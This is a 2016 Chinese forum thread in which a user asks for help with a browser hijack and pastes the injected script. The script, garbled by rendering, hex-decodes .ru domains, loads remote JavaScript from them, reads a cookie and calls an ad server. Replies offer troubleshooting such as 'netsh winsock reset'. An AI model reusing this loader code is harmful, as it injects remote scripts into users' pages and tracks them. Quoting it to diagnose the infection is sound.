这是一个创建于 3089 天前的主题,其中的信息可能已经有所发展或是发生改变。
电脑中招了, 不管是 chrome 还是 firefox 还是 ie 打开所有的网页在<head>里都有一下代码: """ <html><head><script>!function(){var t=JSON.parse('["31747867353936342e7275","7877793673796d746d79637a772e7275"]'),e="26201",o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",o=0;o<t.length;o++)e+=string.fromcharcode(parseint(t[o],16));return e},n="function(t,e,o){var" n="document.location.protocol+" "+t;if(window.smlo&&-1="=navigator.userAgent.toLowerCase().indexOf(" firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else""="" if(window.zsmlo&&-1="=navigator.userAgent.toLowerCase().indexOf(" firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var"="" r="document.createElement(" script");r.setAttribute("src",n),r.setAttribute("type","text="" javascript"),document.head.appendChild(r),r.onload="function(){this.a982392846||(this.a982392846=!0," function"="=typeof""" e&&e())},r.onerror="function(){this.a982392846||(this.a982392846=!0,r.parentNode.removeChild(r)," function"="=typeof" "="" o&&o())}}},r="function(i){var" a="i?i:t[0],s=o(a)+" pjs="" "+e+".js";n(s,function(){},function(){var"="" e="t.indexOf(a),o=t[e+1];o&&r(o)})};r()}();function" getcfcookie(name)="" {="" var="" matches="document.cookie.match(new" regexp("(?:^|;="" )"="" +="" name.replace(="" ([\.$?*|{}\(\)\[\]\\\="" \+^])="" g,="" '\\$1')="" +="" "="([^;]*)" ));"="" return="" matches="" ?="" decodeuricomponent(matches[1])="" :="" undefined;}="" if="" (window.self="=" window.top)="" {="" document.addeventlistener("domcontentloaded",="" function(){="" var="" pops="document.createElement('script');" var="" cfiltercookie="6697e3d5eb75761c638fdeb1eed84055" ;="" var="" cfiltercookieisset="getCfCookie(cfilterCookie)" ?="" getcfcookie(cfiltercookie)="" :="" 0;="" pops.src="//<a href=" http:="" <a="" href="http://contentprotector-us1.com" rel="nofollow">contentprotector-us1.com="" "="" rel="nofollow">contentprotector-us1.com/" +="" 'getcl="" rotator="" '="" +="" 'campaignid="" 1="" '="" +="" 'sourceid="" 109="" '="" +="" 'siteid="" 13138="" '="" +="" 'userid="" 07b57414-d0f4-4fd0-8e24-8ebc6e177c5a="" '="" +="" 'iscookie="" '="" +="" cfiltercookieisset;="" document.head.appendchild(pops);="" });}<="" script=""> <meta http-equiv="content-type" content="text/html;charset=utf-8">
Error: Not Found
The requested URL / was not found on this server.
</body></html>
"""
导致打开所有网页都巨慢!!
手动检查开机启动项和浏览器插件没发现问题。
于是安装了大名鼎鼎的 360 全家桶。查了一晚上木马和病毒,结果报告说“电脑很安全”!! 我 xxxxx 。请问数字你在吃 SHI 吗? 还把我的电脑弄的更慢了! 现在发个帖子都卡的不行!现在感觉真是上贼船了!
小弟不想重装系统,求各位大神有什么高招吗? 谢过先
19 条回复 • 2016-05-25 10:02:11 +08:00
 |
1
casparchen 2016-05-25 05:12:39 +08:00  10
虽然很讨厌数字, 但是这个黑我给 0 分
|
 |
2
cxbig 2016-05-25 05:17:55 +08:00
浏览器装的插件一个个关掉,看看是哪个插件插入的
|
 |
3
sky395 OP @cxbig 所有插件都关了,还是被植入代码, 应该和插件没关系, 因为所有的游览器( chrome , firefox 和 ie )都有这个问题。 感觉像中木马了
|
 |
4
binux 2016-05-25 05:31:38 +08:00
命令行拉个页面看看
|
|
5
cxbig 2016-05-25 05:32:10 +08:00
@sky395 确定不是插件,就进行第二步:随便打开几个 https 页面看看有没有这代码。这个可以简单确认不是静态内容被宽带供应商劫持。
|
|
8
binux 2016-05-25 05:39:52 +08:00
|
|
9
sky395 OP @binux 我这是 win10 系统,没有 curl 命令呀。 应该不是供应商劫持, 同台电脑其它的 win10 系统没有这个问题。 这段代码的表现就是把所有页面里的关键字都变成广告链接。
|
|
10
sky395 OP 很奇怪, 360 浏览器没有被劫持?
|
|
11
sky395 OP 感觉应该是系统木马的劫持,可能是 360 浏览器不出名,导致没有被照顾到?
|
 |
12
ThreeBody 2016-05-25 06:10:25 +08:00 via Android
还有可能是 winsocks 劫持,做一个系统还原点,然后使用
netsh winsock reset 重启后看看 |
 |
13
hx1997 2016-05-25 07:04:58 +08:00 via Android
看看代理服务器?
|
 |
14
anyclue 2016-05-25 09:39:28 +08:00
别用杀毒,用系统查杀里面的常规修复试试,系统急救箱呢?
|
 |
15
cfans1993 2016-05-25 09:43:30 +08:00 via Android
楼主是不是安装了破解版游戏或激动工具
|
|
16
cfans1993 2016-05-25 09:44:00 +08:00 via Android
激活
|
 |
17
rogeecn 2016-05-25 09:53:55 +08:00
问题都没定位到,就把 360 来黑~
|
 |
18
zuoxiaomo 2016-05-25 09:58:26 +08:00
这个和 360 有毛线关系。。。
|
 |
19
dxfree 2016-05-25 10:02:11 +08:00
电脑中招了去装 360 解决,也是够没水平的。。。
|
Select Language